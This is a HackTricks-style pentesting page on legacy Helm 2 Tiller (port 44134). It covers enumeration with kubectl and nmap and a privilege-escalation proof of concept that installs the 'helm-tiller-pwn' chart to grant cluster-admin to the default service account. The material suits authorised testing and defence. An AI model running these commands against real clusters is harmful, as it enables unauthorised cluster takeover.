44134-pentesting-tiller-helm.md (4305B)
1 --- 2 title: "44134 Tiller / Helm" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/44134-pentesting-tiller-helm.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/44134-pentesting-tiller-helm.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 44134 Tiller / Helm 14 15 ## Basic Information 16 17 Helm is a **package manager** for Kubernetes, and its packages are called **charts**. This page concerns the historical Helm 2 architecture, in which the client talked to an in-cluster server named **Tiller** over TCP port 44134. Helm 3 removed Tiller, so finding this port normally indicates a legacy deployment.<sup>[[1]](#references)</sup> 18 19 **Default port:** 44134 20 21 ```text 22 PORT STATE SERVICE VERSION 23 44134/tcp open unknown 24 ``` 25 26 ## Enumeration 27 28 If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **"tiller" in their name**: 29 30 ```bash 31 kubectl get pods | grep -i "tiller" 32 kubectl get services | grep -i "tiller" 33 kubectl get pods -n kube-system | grep -i "tiller" 34 kubectl get services -n kube-system | grep -i "tiller" 35 kubectl get pods -n <namespace> | grep -i "tiller" 36 kubectl get services -n <namespace> | grep -i "tiller" 37 ``` 38 39 Examples: 40 41 ```bash 42 kubectl get pods -n kube-system 43 NAME READY STATUS RESTARTS AGE 44 kube-scheduler-controlplane 1/1 Running 0 35m 45 tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m 46 47 kubectl get services -n kube-system 48 NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE 49 kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m 50 tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m 51 ``` 52 53 You could also try to find this service running checking the port 44134: 54 55 ```bash 56 sudo nmap -sS -p 44134 <IP> 57 ``` 58 59 After discovering it, install a compatible Helm 2 client with a package manager such as Homebrew or download the matching binary from Helm's official releases. A Helm 3 client does not implement the same Tiller workflow.<sup>[[2]](#references)</sup><sup>[[5]](#references)</sup> 60 61 Then, you can **enumerate the service**: 62 63 ```text 64 helm --host tiller-deploy.kube-system:44134 version 65 ``` 66 67 ### Privilege Escalation 68 69 Helm 2 commonly deployed Tiller in `kube-system`. The effective impact depends on Tiller's service account and whether TLS/authentication is configured; an exposed Tiller running with broad RBAC permissions can provide a path to cluster privilege escalation.<sup>[[3]](#references)</sup> 70 71 One proof of concept installs a chart that creates a cluster-admin binding for the `default` service account. It succeeds only if Tiller itself is allowed to create those RBAC objects; it does not make every Tiller deployment automatically cluster-admin.<sup>[[4]](#references)</sup> 72 73 ```text 74 git clone https://github.com/Ruil1n/helm-tiller-pwn 75 helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn 76 /pwnchart 77 ``` 78 79 The chart's exact `clusterrole.yaml` and `clusterrolebinding.yaml` manifests grant broad permissions to the `default` service account. Inspect both files before using the proof of concept.<sup>[[3]](#references)</sup><sup>[[6]](#references)</sup><sup>[[7]](#references)</sup> 80 81 ## References 82 83 - [1] [Helm - Changes Since Helm 2](https://helm.sh/docs/faq/changes_since_helm2/) 84 - [2] [Helm 2 documentation - Installing Helm](https://v2.helm.sh/docs/using_helm/#installing-helm) 85 - [3] [Kubernetes中使用Helm2的安全风险 (Security Risks of Using Helm2 in Kubernetes)](http://rui0.cn/archives/1573) 86 - [4] [`helm-tiller-pwn` proof of concept](https://github.com/Ruil1n/helm-tiller-pwn) 87 - [5] [Official Helm releases](https://github.com/helm/helm/releases) 88 - [6] [`helm-tiller-pwn` `clusterrole.yaml`](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) 89 - [7] [`helm-tiller-pwn` `clusterrolebinding.yaml`](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml)